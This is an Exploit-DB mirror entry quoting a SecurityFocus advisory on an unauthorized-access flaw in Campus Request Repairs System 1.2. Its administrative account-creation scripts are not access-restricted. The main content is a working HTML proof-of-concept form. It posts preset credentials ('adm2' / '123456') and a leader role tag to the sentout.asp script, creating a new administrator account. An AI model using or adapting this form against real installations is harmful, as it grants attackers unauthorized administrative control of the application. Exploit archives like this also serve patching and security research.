exploit-db-mirror/platforms/asp/webapps/31854.html
Offensive Security 5e2fc10125 DB: 2016-09-03
2016-09-03 13:13:25 +00:00

9 lines
No EOL
853 B
HTML
Executable file

source: http://www.securityfocus.com/bid/29376/info
The Campus Request Repairs System is prone to an unauthorized-access vulnerability because it fails to adequately limit access to administrative scripts used for creating accounts.
An attacker can exploit this vulnerability to gain unauthorized administrative access to the application; other attacks are also possible.
The Campus Request Repairs System 1.2 is vulnerable; other versions may also be vulnerable.
<form action="http://www.example.com/repair/pwd/sentout.asp" method="post"> user: <input type="text" name="pID" value="adm2"><br> pass: <input type="text" name="Pwd" value="123456"> <input type="hidden" name="pFrom" value="N/A"> <input type="hidden" name="pName" value="N/A"> <input type="hidden" name="pTag" value="z,repair,leader"> <input type="submit" value="add"> </form>